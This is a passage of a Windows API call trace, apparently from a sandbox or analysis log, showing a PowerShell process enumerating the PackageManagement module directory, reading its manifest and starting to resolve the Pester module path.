ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0168.980] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0168.981] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0168.981] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0168.981] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0168.981] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0168.981] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0168.981] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0168.982] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0168.982] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0168.982] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0168.982] FindClose (in: hFindFile=0x1e35146b240 | out: hFindFile=0x1e35146b240) returned 1 [0168.982] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0168.982] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0168.983] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0168.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c630) returned 1 [0168.983] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c710 | out: lpFileInformation=0xb156f8c710*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5f0) returned 1 [0168.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c680) returned 1 [0168.983] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8c160, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0168.983] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0xb156f8c390 | out: lpFindFileData=0xb156f8c390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b720 [0168.983] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.984] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0168.984] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0168.984] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0168.984] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0168.985] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0168.985] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0168.985] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0168.985] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0168.985] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0168.986] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0168.986] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0168.986] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0168.986] FindClose (in: hFindFile=0x1e35146b720 | out: hFindFile=0x1e35146b720) returned 1 [0168.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5b0) returned 1 [0168.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c570) returned 1 [0168.987] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0168.989] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0168.989] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0168.989] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0168.989] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0168.989] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0xb156f8c370, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0168.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0168.990] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c8a0 | out: lpFileInformation=0xb156f8c8a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0168.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0168.990] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0xb156f8c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0168.990] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0xb156f8c520 | out: lpFindFileData=0xb156f8c520*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b240 [0168.990] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c4e0 | out: lpFindFileData=0xb156f8c4e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.990] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c4e0 | out: lpFindFileData=0xb156f8c4e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0168.991] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c4e0 | out: lpFindFileData=0xb156f8c4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0168.991] FindClose (in: hFindFile=0x1e35146b240 | out: hFindFile=0x1e35146b240) returned 1 [0168.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0168.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0168.991] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0168.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c830) returned 1 [0168.991] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c910 | out: lpFileInformation=0xb156f8c910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1 [0168.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c7f0) returned 1 [0168.991] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0168.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c5d0) returned 1 [0168.992] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x798 [0168.992] GetFileType (hFile=0x798) returned 0x1 [0168.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c540) returned 1 [0168.992] GetFileType (hFile=0x798) returned 0x1 [0168.992] ReadFile (in: hFile=0x798, lpBuffer=0x1e3398eb810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c6a8, lpOverlapped=0x0 | out: lpBuffer=0x1e3398eb810*, lpNumberOfBytesRead=0xb156f8c6a8*=0x5f8, lpOverlapped=0x0) returned 1 [0168.992] ReadFile (in: hFile=0x798, lpBuffer=0x1e3398ead48, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0xb156f8c6a8, lpOverlapped=0x0 | out: lpBuffer=0x1e3398ead48*, lpNumberOfBytesRead=0xb156f8c6a8*=0x0, lpOverlapped=0x0) returned 1 [0168.992] ReadFile (in: hFile=0x798, lpBuffer=0x1e3398eb810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c6a8, lpOverlapped=0x0 | out: lpBuffer=0x1e3398eb810*, lpNumberOfBytesRead=0xb156f8c6a8*=0x0, lpOverlapped=0x0) returned 1 [0168.992] CloseHandle (hObject=0x798) returned 1 [0168.995] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0168.995] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0168.996] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0168.996] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0168.996] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0168.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0168.996] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xb156f8c290, lpFilePart=0x0 | out: lpBuffer="C:\\Program 